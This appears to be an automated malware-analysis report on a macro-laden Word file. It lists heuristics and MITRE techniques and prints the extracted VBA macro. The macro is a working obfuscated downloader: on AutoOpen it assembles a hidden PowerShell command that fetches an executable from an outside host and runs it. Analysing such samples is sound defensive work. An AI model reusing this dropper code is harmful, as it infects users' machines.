MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros, including an AutoOpen macro, and a critical 'Shell()' call, indicating malicious intent. The 'SE_ENABLE_LURE' heuristic suggests the document attempts to trick the user into enabling macros. The ClamAV detection and the presence of a VBA macro named 'macros.bas' further support its malicious nature. The macro's obfuscated code likely attempts to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Trojan.X-Mas-5635802-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.X-Mas-5635802-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12475 bytes |
SHA-256: 10aca1c8671db42d67b4ee5f28720f42915cb36ca19573a8e84080b4274786c0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "mode"
Sub ladmo()
rbe = "PD"
yg = "h^"
rz = "^T"
da = ".w"
p = "t "
kfa = "^N"
uvr = " "
esx = "^ "
ok = "S^"
xh = "Ow"
tze = "^w"
mpa = "'"""
azv = "FI"
ywk = "oN"
ca = ";S"
yhc = "io"
wxa = "^o"
Z = " "
gy = "po"
ps = "BJ"
fy = "Xe"
xso = "xe"
jf = "TI"
wy = "Pr"
t = " "
azh = "'%"
ibh = "')"
us = "t^"
dc = "^D"
yl = "C^"
ki = "a%"
ynx = "^O"
ze = "^e"
ilg = "E^"
kh = "-^"
od = " "
wu = "^a"
qju = "^E"
uw = "a%"
x = "E^"
vpo = "/P"
j = ".e"
eh = "eW"
v = "rs"
yh = "Cl"
u = "D."
yp = "//"
c = ".h"
kz = "SY"
d = " "
pga = "tt"
pl = "',"
wso = "-E"
om = "c^"
iv = " ^"
vj = "S^"
um = ")^"
f = " b"
a = "XE"
wn = "E "
fz = ".E"
bs = "^o"
gby = "os"
jc = "3/"
uzj = "PO"
yqs = "^R"
che = "I^"
ci = "Oa"
opw = " "
nm = "mp"
k = "er"
ajb = "'%"
vn = "nL"
hr = "LI"
se = "U^"
mnywig = ActiveDocument.DefaultTableStyle
cy = "s^"
E = "Cy"
s = "E^"
he = "Cm"
ol = "E("
icc = "Pr"
efg = "cE"
jhi = "^b"
lho = "XE"
xgu = "^o"
zq = "M."
ew = "LI"
ak = "T^"
egn = "ap"
elq = "^l"
bf = " "
o = "^w"
ivp = "N^"
sdo = "T^"
ma = "44"
b = "-N"
igf = "^c"
ik = "nD"
eb = "Wi"
wc = "Yp"
gk = "ie"
gi = "nt"
okc = "At"
ep = "on"
xga = "n1"
ivk = "D^"
i = "Yl"
zwy = "aT"
y = "ss"
wga = ".e"
pb = "HI"
ne = "t:"
yk = "p:"
uz = "L^"
ihv = "Nt"
zu = "D^"
ml = "ap"
ub = "EL"
fj = "te"
kg = " "
kky = "Ta"
pi = "/c"
wq = "^ "
py = " ^"
ym = "-^"
sy = "De"
bg = "xe"
dzi = "^-"
n = "Le"
yzq = "(N"
ums = "S "
eg = "E "
l = "Ex"
ur = "Of"
re = " """
pdy = "pd"
xpi = "GP"
eqf = "e^"
ck = ".^"
irn = ".e"
q = "'h"
icovog = he + u + l + eg + pi + re + uzj + o + s + v + yg + ub + uz + wga + a + uvr + iv + wso + xso + igf + se + jf + ywk + gy + ew + E + Z + opw + f + wc + wu + y + esx + kg + od + b + ynx + icc + ur + che + n + bf + ym + eb + ik + xgu + tze + ok + ak + i + wn + py + pb + zu + sy + kfa + wq + t + yzq + eh + dzi + wxa + ps + x + om + p + d + kz + cy + us + eqf + zq + ivp + ilg + sdo + da + ze + jhi + yl + hr + qju + ihv + um + ck + ivk + xh + vn + ci + dc + azv + elq + ol + q + pga + yk + yp + ep + yhc + xga + c + gby + ne + ma + jc + fj + nm + k + vpo + xpi + yh + gk + gi + j + bg + pl + azh + egn + rbe + zwy + ki + irn + fy + ibh + ca + kky + yqs + rz + kh + wy + bs + efg + vj + ums + ajb + ml + pdy + okc + uw + fz + lho + mpa
If mnywig = "" Then
Shell icovog, 0
End If
End Sub
Sub AutoOpen()
ladmo
End Sub
' Processing file: /opt/analyzer/scan_staging/703291eb819f4703943c783f6f869ee2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1088 bytes
' Macros/VBA/Module1 - 831 bytes
' Macros/VBA/Module2 - 831 bytes
' Macros/VBA/mode - 7652 bytes
' Line #0:
' FuncDefn (Sub ladmo())
' Line #1:
' Line #2:
' LitStr 0x0002 "PD"
' St rbe
' Line #3:
' LitStr 0x0002 "h^"
' St yg
' Line #4:
' LitStr 0x0002 "^T"
' St rz
' Line #5:
' LitStr 0x0002 ".w"
' St da
' Line #6:
' LitStr 0x0002 "t "
' St p
' Line #7:
' LitStr 0x0002 "^N"
' St kfa
' Line #8:
' LitStr 0x0002 " "
' St uvr
' Line #9:
' LitStr 0x0002 "^ "
' St esx
' Line #10:
' LitStr 0x0002 "S^"
' St ok
' Line #11:
' LitStr 0x0002 "Ow"
' St xh
' Line #12:
' LitStr 0x0002 "^w"
' St tze
' Line #13:
' LitStr 0x0002 "'""
' St mpa
' Line #14:
' LitStr 0x0002 "FI"
' St azv
' Line #15:
' LitStr 0x0002 "oN"
' St ywk
' Line #16:
' LitStr 0x0002 ";S"
' St ca
' Line #17:
' LitStr 0x0002 "io"
' St yhc
' Line #18:
' LitStr 0x0002 "^o"
' St wxa
' Line #19:
' LitStr 0x0002 " "
' St Z
' Line #20:
' LitStr 0x0002 "po"
' St gy
' Line #21:
' LitStr 0x0002 "BJ"
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.